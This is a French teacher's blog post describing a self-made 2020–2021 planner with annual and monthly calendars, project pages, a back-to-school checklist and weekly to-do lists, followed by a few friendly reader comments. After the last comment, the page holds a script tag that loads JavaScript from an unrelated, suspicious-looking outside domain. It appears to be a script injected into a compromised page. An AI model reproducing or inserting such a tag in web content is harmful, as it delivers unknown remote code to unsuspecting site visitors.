• Bullet agenda 2020 2021

    Chaque année, je cherche un outil qui me permette de m'organiser toute l'année, de planifier mon travail au fil du temps… Chaque année je choisis un outil proposé par les collègues blogueuses mais à chaque fois il y a des choses qui ne me servent pas, des présentations qui ne me conviennent pas, des choses qui me manquent ...

    Du coup pour la prochaine rentrée, j'ai construit mon propre bullet agenda qui correspond à mes besoins de maitresse et de directrice.

    Bullet agenda 2020 2021

    Il se compose d'un calendrier annuel, pour se repérer d'un coup d'œil dans l'année.

    Bullet agenda 2020 2021

    Ensuite viennent des pages sur les projets : projets annuels et projets par période pour organiser son année et tout retrouver rapidement.

    Bullet agenda 2020 2021

    Une page pour préparer le jour de la rentrée avec des  to do lists pour les documents administratifs (très utile pour moi en tant que directrice), l'organisation de la classe (par exemple, organisation de la classe, cahiers, étiquettes, affichages ….), et tout ce à quoi il faut penser pour le jour J.

    Bullet agenda 2020 2021

    Ensuite vient l'agenda à proprement parlé :

    un calendrier mensuel sur une page puis une page par semaine avec une case par jour (une seule pour le Week-end), permettant de noter les RDV, visites, sorties, réunions …

    Bullet agenda 2020 2021

    et une to do list pour noter chaque semaine les choses à faire (Je m'en sers surtout pour la direction, pour planifier ce que j'ai à faire sur mon jour de décharge).

    Bullet agenda 2020 2021

    Cet outil est donc un outil que j'ai pensé pour ma classe, ma situation (classe + direction), en espérant que d'autres y trouvent des idées pour concevoir le leur.

    Et comme les goûts et les couleurs, c'est très personnel, je vous propose diverses versions de couleur ;-)

    « Stranger thingsDonner du sens aux apprentissages: oui, mais comment ?! »
    Pin It

    Tags Tags : , , ,
  • Commentaires

    6
    Rose66
    Mardi 21 Avril 2020 à 10:07

    Belle découverte que votre site ! Merci à toutes les 9! Le travail en équipe c'est une force dans notre métier mais ce n'est pas toujours possible dans nos petites écoles... alors se "regrouper" sur internet, quelle bonne idée!

    Merci à vous.

    PS : Moi je vais choisir le rose... c'est sûr!

      • Mardi 21 Avril 2020 à 11:13

        Merci pour ce commentaire !

        Contente que tu trouves ton bonheur parmi les couleurs proposées.

    5
    Lundi 20 Avril 2020 à 18:11

    Lequel vas-tu choisir ? Dur dur de faire un choix !

      • Lundi 20 Avril 2020 à 20:46

        Merci !

        Je crois bien que je vais choisir le rose et bleu … mais j'hésite !

    4
    maitreSmorgane
    Lundi 20 Avril 2020 à 17:15

    Ils sont tous magnifiques! Merci maitreSkatell!

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :